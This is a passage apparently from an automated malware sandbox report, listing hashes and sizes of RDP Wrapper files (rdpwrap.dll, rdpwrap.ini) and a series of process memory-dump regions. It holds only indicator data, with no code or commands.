
                                                                                                                                                              c9baae1a87fef165e9942119fb19631a2cbda8d8

                                                                                                                                                              SHA256

                                                                                                                                                              54b9b8048365c9705d5b39c638c7ce5599a93685b2a44020ede883185409bb9f

                                                                                                                                                              SHA512

                                                                                                                                                              da79293ea0a508ea3db40d6041d4d3d414772e32962eaae627e4a750b21872bb50a930bd6c97da86c18cd060e6fd9c3b746e396141ba7b1e38ca8596c5ed84b6

                                                                                                                                                            • \??\c:\program files\rdp wrapper\rdpwrap.dll

                                                                                                                                                              Filesize

                                                                                                                                                              114KB

                                                                                                                                                              MD5

                                                                                                                                                              461ade40b800ae80a40985594e1ac236

                                                                                                                                                              SHA1

                                                                                                                                                              b3892eef846c044a2b0785d54a432b3e93a968c8

                                                                                                                                                              SHA256

                                                                                                                                                              798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

                                                                                                                                                              SHA512

                                                                                                                                                              421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

                                                                                                                                                            • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                                                                                                                                              Filesize

                                                                                                                                                              128KB

                                                                                                                                                              MD5

                                                                                                                                                              dddd741ab677bdac8dcd4fa0dda05da2

                                                                                                                                                              SHA1

                                                                                                                                                              69d328c70046029a1866fd440c3e4a63563200f9

                                                                                                                                                              SHA256

                                                                                                                                                              7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

                                                                                                                                                              SHA512

                                                                                                                                                              6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

                                                                                                                                                            • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                                                                                                                                              Filesize

                                                                                                                                                              137KB

                                                                                                                                                              MD5

                                                                                                                                                              d6801fc820bf493f5ccbc61145b0841f

                                                                                                                                                              SHA1

                                                                                                                                                              037c8d16fcdff9a0ef3136148b3fa02ef9f35f36

                                                                                                                                                              SHA256

                                                                                                                                                              fd4499c428c8db74193b78c0847bce152c79f4800a73da6618b6c45489c58033

                                                                                                                                                              SHA512

                                                                                                                                                              7c2c047a4c817c3b5db69e2b617060722e7241ef290d77554309c91c8be8de3a6b5f5b0aa2c5c8ba286acfe30486f16b11f0fcd05e3d0960d2712787ddd79171

                                                                                                                                                            • memory/1352-1-0x00000237EC820000-0x00000237EC842000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              136KB

                                                                                                                                                            • memory/1352-15-0x00007FF9D97A0000-0x00007FF9DA261000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              10.8MB

                                                                                                                                                            • memory/1352-12-0x00007FF9D97A0000-0x00007FF9DA261000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              10.8MB

                                                                                                                                                            • memory/1352-11-0x00007FF9D97A0000-0x00007FF9DA261000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              10.8MB

                                                                                                                                                            • memory/1352-0-0x00007FF9D97A3000-0x00007FF9D97A5000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              8KB

                                                                                                                                                            • memory/1752-260-0x000001CB6B010000-0x000001CB6B058000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              288KB

                                                                                                                                                            • memory/1752-261-0x000001CB6B060000-0x000001CB6B27C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.1MB

                                                                                                                                                            • memory/1900-399-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/1908-341-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/3336-405-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/3988-377-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/4332-414-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/4424-22-0x0000000000A20000-0x0000000000DED000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              3.8MB

                                                                                                                                                            • memory/4424-16-0x0000000000A20000-0x0000000000DED000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              3.8MB

                                                                                                                                                            • memory/4452-164-0x00000264C8580000-0x00000264C8592000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              72KB

                                                                                                                                                            • memory/4452-166-0x00000264C81D0000-0x00000264C81DA000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                            • memory/4800-390-0x000001874BE10000-0x000001874C02C000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              2.1MB

                                                                                                                                                            • memory/4928-391-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/4928-362-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/4992-352-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB

                                                                                                                                                            • memory/5040-239-0x0000000000400000-0x000000000056F000-memory.dmp

                                                                                                                                                              Filesize

                                                                                                                                                              1.4MB